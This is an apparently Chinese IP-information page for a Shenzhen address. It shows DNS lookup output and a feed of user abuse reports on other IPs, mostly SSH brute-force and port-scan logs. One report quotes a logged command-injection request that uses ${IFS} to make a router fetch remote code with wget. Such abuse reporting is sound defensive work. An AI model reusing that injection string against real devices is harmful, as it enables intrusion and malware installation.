14.21.92.128 - IPInfo

基本信息:

城市(city): Shenzhen

省份(region): Guangdong

国家(country): China

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.21.92.128
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10498
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;14.21.92.128.			IN	A

;; AUTHORITY SECTION:
.			438	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020022301 1800 900 604800 86400

;; Query time: 108 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 24 05:19:16 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 128.92.21.14.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 128.92.21.14.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
79.44.62.112	attackspambots	2019-10-21 x@x 2019-10-21 12:18:18 unexpected disconnection while reading SMTP command from host112-62-dynamic.44-79-r.retail.telecomhostnamealia.hostname [79.44.62.112]:24459 I=[10.100.18.25]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=79.44.62.112	2019-10-21 23:46:35
188.92.77.12	attack	188.92.77.12 - - [21/Oct/2019:09:19:40 +0300] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15" 188.92.77.12 - - [21/Oct/2019:09:19:40 +0300] "POST /apply_sec.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36" 188.92.77.12 - - [21/Oct/2019:09:20:11 +0300] "GET /cgi-bin/;${IFS}wget${IFS}http://188.92.77.12/get.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36" ...	2019-10-22 00:08:29
176.109.224.16	attack	Automatic report - Port Scan Attack	2019-10-22 00:15:56
121.7.194.71	attack	SSH bruteforce (Triggered fail2ban)	2019-10-21 23:32:35
81.22.45.107	attackspambots	10/21/2019-17:52:19.377700 81.22.45.107 Protocol: 6 ET DROP Dshield Block Listed Source group 1	2019-10-22 00:11:19
154.183.195.214	attackspambots	2019-10-21 x@x 2019-10-21 12:22:32 unexpected disconnection while reading SMTP command from (host-154.183.214.195-static.tedata.net) [154.183.195.214]:48195 I=[10.100.18.23]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=154.183.195.214	2019-10-22 00:10:57
116.255.169.148	attackbotsspam	Oct 21 14:41:24 server sshd\[31028\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.255.169.148 user=root Oct 21 14:41:26 server sshd\[31028\]: Failed password for root from 116.255.169.148 port 51228 ssh2 Oct 21 14:41:27 server sshd\[31029\]: Received disconnect from 116.255.169.148: 3: com.jcraft.jsch.JSchException: Auth fail Oct 21 14:41:30 server sshd\[31038\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.255.169.148 user=root Oct 21 14:41:32 server sshd\[31038\]: Failed password for root from 116.255.169.148 port 53750 ssh2 ...	2019-10-21 23:44:34
218.19.136.84	attackbots	(sshd) Failed SSH login from 218.19.136.84 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Oct 21 12:51:53 server2 sshd[2895]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.19.136.84 user=root Oct 21 12:51:55 server2 sshd[2895]: Failed password for root from 218.19.136.84 port 9045 ssh2 Oct 21 13:26:41 server2 sshd[3810]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.19.136.84 user=root Oct 21 13:26:43 server2 sshd[3810]: Failed password for root from 218.19.136.84 port 8640 ssh2 Oct 21 13:41:42 server2 sshd[4231]: Invalid user ethan from 218.19.136.84 port 6260	2019-10-21 23:35:00
218.75.98.230	attack	Unauthorised access (Oct 21) SRC=218.75.98.230 LEN=40 TOS=0x10 PREC=0x40 TTL=238 ID=8663 TCP DPT=445 WINDOW=1024 SYN Unauthorised access (Oct 21) SRC=218.75.98.230 LEN=52 TOS=0x10 PREC=0x40 TTL=47 ID=4315 DF TCP DPT=445 WINDOW=8192 SYN Unauthorised access (Oct 17) SRC=218.75.98.230 LEN=52 TOS=0x10 PREC=0x40 TTL=47 ID=8868 DF TCP DPT=445 WINDOW=8192 SYN Unauthorised access (Oct 14) SRC=218.75.98.230 LEN=48 TOS=0x10 PREC=0x40 TTL=111 ID=24387 DF TCP DPT=445 WINDOW=8192 SYN	2019-10-22 00:07:52
171.109.158.61	attack	SSH Scan	2019-10-21 23:32:13
186.10.17.84	attackspambots	Oct 21 10:29:45 xtremcommunity sshd\[746567\]: Invalid user test from 186.10.17.84 port 55528 Oct 21 10:29:45 xtremcommunity sshd\[746567\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.10.17.84 Oct 21 10:29:47 xtremcommunity sshd\[746567\]: Failed password for invalid user test from 186.10.17.84 port 55528 ssh2 Oct 21 10:34:13 xtremcommunity sshd\[746665\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.10.17.84 user=root Oct 21 10:34:15 xtremcommunity sshd\[746665\]: Failed password for root from 186.10.17.84 port 37374 ssh2 ...	2019-10-22 00:08:58
103.61.196.254	attackspam	Port 1433 Scan	2019-10-22 00:04:29
159.203.175.216	attackbotsspam	Repeated attempts to hack word press website.	2019-10-22 00:13:23
209.177.94.56	attackbotsspam	Oct 21 17:58:53 dcd-gentoo sshd[31712]: User root from 209.177.94.56 not allowed because none of user's groups are listed in AllowGroups Oct 21 17:58:56 dcd-gentoo sshd[31715]: User root from 209.177.94.56 not allowed because none of user's groups are listed in AllowGroups Oct 21 17:58:57 dcd-gentoo sshd[31719]: User root from 209.177.94.56 not allowed because none of user's groups are listed in AllowGroups ...	2019-10-22 00:01:24
103.17.159.54	attack	2019-10-21T13:54:04.448348abusebot-4.cloudsearch.cf sshd\[21914\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.17.159.54 user=root	2019-10-22 00:15:20

最近上报的IP列表

91.44.43.199	193.90.104.150	116.24.134.69	216.165.133.14
68.21.180.164	41.82.127.231	193.230.206.174	187.112.170.168
206.186.19.119	173.127.36.26	201.73.12.47	126.182.29.101
190.75.241.72	17.91.141.137	37.121.89.56	115.207.6.164
165.55.36.77	63.151.23.139	207.143.193.116	179.201.60.148